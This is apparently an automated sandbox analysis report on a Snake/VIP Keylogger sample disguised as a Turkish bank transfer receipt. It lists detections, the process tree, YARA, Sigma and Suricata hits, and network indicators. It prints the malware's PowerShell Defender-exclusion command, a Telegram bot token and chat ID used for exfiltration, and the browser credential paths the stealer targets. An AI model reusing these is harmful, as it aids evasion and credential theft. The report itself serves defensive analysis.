Edit tour

Windows Analysis Report
dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe

Overview

General Information

Sample name:	dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe renamed because original name is a hash value
Original sample name:	dekont garanti bbva_Baka Bankaya Transfer 01112 img .exe
Analysis ID:	1586930
MD5:	88398f906322ec15187390184b930a71
SHA1:	ad89392d4d6978bdcc006619848e6e66af945326
SHA256:	97b8275d582b042ef248a2983905bb23280d609ba51393b7abd58fb7d94e9fd0
Tags:	exeSnakeKeyloggeruser-lowmal3
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for sample

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Downloader

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Creates processes with suspicious names

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe (PID: 7292 cmdline: "C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe" MD5: 88398F906322EC15187390184B930A71)

powershell.exe (PID: 7504 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe (PID: 7520 cmdline: "C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe" MD5: 88398F906322EC15187390184B930A71)

dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe (PID: 7540 cmdline: "C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe" MD5: 88398F906322EC15187390184B930A71)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "Telegram", "Bot Token": "7611127374:AAGXC2jAyl-P1rRPCEhU4dJbqLtPBhqL70U", "Chat id": "-4732682041", "Version": "4.4"}

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Token": "7611127374:AAGXC2jAyl-P1rRPCEhU4dJbqLtPBhqL70U", "Chat_id": "-4732682041", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000006.00000002.3800099340.0000000002E8A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000006.00000002.3797686063.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000002.3797686063.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000006.00000002.3797686063.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000006.00000002.3797686063.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2d03b:$a1: get_encryptedPassword 0x2d350:$a2: get_encryptedUsername 0x2ce4b:$a3: get_timePasswordChanged 0x2cf54:$a4: get_passwordField 0x2d051:$a5: set_encryptedPassword 0x2e6f7:$a7: get_logins 0x2e65a:$a10: KeyLoggerEventArgs 0x2e2bf:$a11: KeyLoggerEventArgsEventHandler
00000006.00000002.3800099340.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.1385532363.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1385532363.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000002.1385532363.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.1385532363.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dda3:$a1: get_encryptedPassword 0x707c3:$a1: get_encryptedPassword 0xb2fe3:$a1: get_encryptedPassword 0x2e0b8:$a2: get_encryptedUsername 0x70ad8:$a2: get_encryptedUsername 0xb32f8:$a2: get_encryptedUsername 0x2dbb3:$a3: get_timePasswordChanged 0x705d3:$a3: get_timePasswordChanged 0xb2df3:$a3: get_timePasswordChanged 0x2dcbc:$a4: get_passwordField 0x706dc:$a4: get_passwordField 0xb2efc:$a4: get_passwordField 0x2ddb9:$a5: set_encryptedPassword 0x707d9:$a5: set_encryptedPassword 0xb2ff9:$a5: set_encryptedPassword 0x2f45f:$a7: get_logins 0x71e7f:$a7: get_logins 0xb469f:$a7: get_logins 0x2f3c2:$a10: KeyLoggerEventArgs 0x71de2:$a10: KeyLoggerEventArgs 0xb4602:$a10: KeyLoggerEventArgs
Process Memory Space: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe PID: 7292	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe PID: 7292	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe PID: 7292	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe PID: 7292	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe PID: 7292	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x27757:$a1: get_encryptedPassword 0x27a62:$a2: get_encryptedUsername 0x27571:$a3: get_timePasswordChanged 0x2767a:$a4: get_passwordField 0x2776d:$a5: set_encryptedPassword 0x29c07:$a7: get_logins 0x29b6a:$a10: KeyLoggerEventArgs 0x297d3:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe PID: 7540	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe PID: 7540	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe PID: 7540	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe PID: 7540	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2131:$a1: get_encryptedPassword 0x243c:$a2: get_encryptedUsername 0x1f4b:$a3: get_timePasswordChanged 0x2054:$a4: get_passwordField 0x2147:$a5: set_encryptedPassword 0x45e1:$a7: get_logins 0x4544:$a10: KeyLoggerEventArgs 0x41ad:$a11: KeyLoggerEventArgsEventHandler
Click to see the 14 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.3aa1b68.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.3aa1b68.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.3aa1b68.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.3aa1b68.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2b43b:$a1: get_encryptedPassword 0x2b750:$a2: get_encryptedUsername 0x2b24b:$a3: get_timePasswordChanged 0x2b354:$a4: get_passwordField 0x2b451:$a5: set_encryptedPassword 0x2caf7:$a7: get_logins 0x2ca5a:$a10: KeyLoggerEventArgs 0x2c6bf:$a11: KeyLoggerEventArgsEventHandler
0.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.3aa1b68.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x39263:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38906:$a3: \Google\Chrome\User Data\Default\Login Data 0x38b63:$a4: \Orbitum\User Data\Default\Login Data 0x39542:$a5: \Kometa\User Data\Default\Login Data
0.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.3aa1b68.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2c065:$s1: UnHook 0x2c06c:$s2: SetHook 0x2c074:$s3: CallNextHook 0x2c081:$s4: _hook
0.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.3ae4588.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.3ae4588.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.3ae4588.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.3ae4588.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2b43b:$a1: get_encryptedPassword 0x2b750:$a2: get_encryptedUsername 0x2b24b:$a3: get_timePasswordChanged 0x2b354:$a4: get_passwordField 0x2b451:$a5: set_encryptedPassword 0x2caf7:$a7: get_logins 0x2ca5a:$a10: KeyLoggerEventArgs 0x2c6bf:$a11: KeyLoggerEventArgsEventHandler
0.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.3ae4588.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x39263:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38906:$a3: \Google\Chrome\User Data\Default\Login Data 0x38b63:$a4: \Orbitum\User Data\Default\Login Data 0x39542:$a5: \Kometa\User Data\Default\Login Data
0.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.3ae4588.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2c065:$s1: UnHook 0x2c06c:$s2: SetHook 0x2c074:$s3: CallNextHook 0x2c081:$s4: _hook
6.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
6.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
6.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.400000.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
6.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
6.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2d23b:$a1: get_encryptedPassword 0x2d550:$a2: get_encryptedUsername 0x2d04b:$a3: get_timePasswordChanged 0x2d154:$a4: get_passwordField 0x2d251:$a5: set_encryptedPassword 0x2e8f7:$a7: get_logins 0x2e85a:$a10: KeyLoggerEventArgs 0x2e4bf:$a11: KeyLoggerEventArgsEventHandler
6.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b063:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3a706:$a3: \Google\Chrome\User Data\Default\Login Data 0x3a963:$a4: \Orbitum\User Data\Default\Login Data 0x3b342:$a5: \Kometa\User Data\Default\Login Data
6.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2de65:$s1: UnHook 0x2de6c:$s2: SetHook 0x2de74:$s3: CallNextHook 0x2de81:$s4: _hook
0.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.3ae4588.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.3ae4588.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.3ae4588.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.3ae4588.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.3ae4588.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2d23b:$a1: get_encryptedPassword 0x6fa5b:$a1: get_encryptedPassword 0x2d550:$a2: get_encryptedUsername 0x6fd70:$a2: get_encryptedUsername 0x2d04b:$a3: get_timePasswordChanged 0x6f86b:$a3: get_timePasswordChanged 0x2d154:$a4: get_passwordField 0x6f974:$a4: get_passwordField 0x2d251:$a5: set_encryptedPassword 0x6fa71:$a5: set_encryptedPassword 0x2e8f7:$a7: get_logins 0x71117:$a7: get_logins 0x2e85a:$a10: KeyLoggerEventArgs 0x7107a:$a10: KeyLoggerEventArgs 0x2e4bf:$a11: KeyLoggerEventArgsEventHandler 0x70cdf:$a11: KeyLoggerEventArgsEventHandler
0.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.3ae4588.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2de65:$s1: UnHook 0x70685:$s1: UnHook 0x2de6c:$s2: SetHook 0x7068c:$s2: SetHook 0x2de74:$s3: CallNextHook 0x70694:$s3: CallNextHook 0x2de81:$s4: _hook 0x706a1:$s4: _hook
0.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.3aa1b68.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.3aa1b68.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.3aa1b68.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.3aa1b68.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.3aa1b68.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2d23b:$a1: get_encryptedPassword 0x6fc5b:$a1: get_encryptedPassword 0xb247b:$a1: get_encryptedPassword 0x2d550:$a2: get_encryptedUsername 0x6ff70:$a2: get_encryptedUsername 0xb2790:$a2: get_encryptedUsername 0x2d04b:$a3: get_timePasswordChanged 0x6fa6b:$a3: get_timePasswordChanged 0xb228b:$a3: get_timePasswordChanged 0x2d154:$a4: get_passwordField 0x6fb74:$a4: get_passwordField 0xb2394:$a4: get_passwordField 0x2d251:$a5: set_encryptedPassword 0x6fc71:$a5: set_encryptedPassword 0xb2491:$a5: set_encryptedPassword 0x2e8f7:$a7: get_logins 0x71317:$a7: get_logins 0xb3b37:$a7: get_logins 0x2e85a:$a10: KeyLoggerEventArgs 0x7127a:$a10: KeyLoggerEventArgs 0xb3a9a:$a10: KeyLoggerEventArgs
0.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.3aa1b68.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2de65:$s1: UnHook 0x70885:$s1: UnHook 0xb30a5:$s1: UnHook 0x2de6c:$s2: SetHook 0x7088c:$s2: SetHook 0xb30ac:$s2: SetHook 0x2de74:$s3: CallNextHook 0x70894:$s3: CallNextHook 0xb30b4:$s3: CallNextHook 0x2de81:$s4: _hook 0x708a1:$s4: _hook 0xb30c1:$s4: _hook
Click to see the 26 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe", ParentImage: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe, ParentProcessId: 7292, ParentProcessName: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe", ProcessId: 7504, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe", ParentImage: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe, ParentProcessId: 7292, ParentProcessName: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe", ProcessId: 7504, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-09T19:11:15.674977+0100	2803305	3	Unknown Traffic	192.168.2.9	49752	104.21.96.1	443	TCP
2025-01-09T19:11:17.139493+0100	2803305	3	Unknown Traffic	192.168.2.9	49766	104.21.96.1	443	TCP
2025-01-09T19:11:21.397626+0100	2803305	3	Unknown Traffic	192.168.2.9	49797	104.21.96.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-09T19:11:13.672206+0100	2803274	2	Potentially Bad Traffic	192.168.2.9	49740	193.122.130.0	80	TCP
2025-01-09T19:11:14.773624+0100	2803274	2	Potentially Bad Traffic	192.168.2.9	49740	193.122.130.0	80	TCP
2025-01-09T19:11:16.469103+0100	2803274	2	Potentially Bad Traffic	192.168.2.9	49759	193.122.130.0	80	TCP

Joe Security ANOMALY Telegram Send File

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-09T19:11:34.494484+0100	1810008	1	Potentially Bad Traffic	192.168.2.9	49882	149.154.167.220	443	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-09T19:11:27.543452+0100	1810007	1	Potentially Bad Traffic	192.168.2.9	49839	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe

Avira: detected

Found malware configuration

Source: 00000006.00000002.3797686063.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7611127374:AAGXC2jAyl-P1rRPCEhU4dJbqLtPBhqL70U", "Chat_id": "-4732682041", "Version": "4.4"}
Source: 0.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.3aa1b68.2.raw.unpack	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "Telegram", "Bot Token": "7611127374:AAGXC2jAyl-P1rRPCEhU4dJbqLtPBhqL70U", "Chat id": "-4732682041", "Version": "4.4"}

Multi AV Scanner detection for submitted file

Source: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe

ReversingLabs: Detection: 68%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.9:49746 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49839 version: TLS 1.2

Source: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: ZBwN.pdb source: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe
Source:	Binary string: ZBwN.pdbSHA256X+ source: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe

Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 4x nop then jmp 088B9800h	0_2_088B9D79
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 4x nop then jmp 00FDF475h	6_2_00FDF2D8
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 4x nop then jmp 00FDF475h	6_2_00FDF4C4
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 4x nop then jmp 00FDFC31h	6_2_00FDF979
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 4x nop then jmp 056B7EB5h	6_2_056B7B78
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 4x nop then jmp 056B9280h	6_2_056B8FB0
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 4x nop then jmp 056B0FF1h	6_2_056B0D48
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 4x nop then jmp 056BE816h	6_2_056BE548
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 4x nop then jmp 056BC826h	6_2_056BC558
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 4x nop then jmp 056BCCB6h	6_2_056BC9E8
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 4x nop then jmp 056B18A1h	6_2_056B15F8
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 4x nop then jmp 056BECA6h	6_2_056BE9D8
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 4x nop then jmp 056B1449h	6_2_056B11A0
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 4x nop then jmp 056B3709h	6_2_056B3460
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 4x nop then jmp 056B02E9h	6_2_056B0040
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 4x nop then jmp 056BDEF6h	6_2_056BDC28
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 4x nop then jmp 056BBF06h	6_2_056BBC38
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 4x nop then jmp 056B62D9h	6_2_056B6030
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 4x nop then jmp 056B32B1h	6_2_056B3008
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 4x nop then jmp 056B0B99h	6_2_056B08F0
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 4x nop then jmp 056BC396h	6_2_056BC0C8
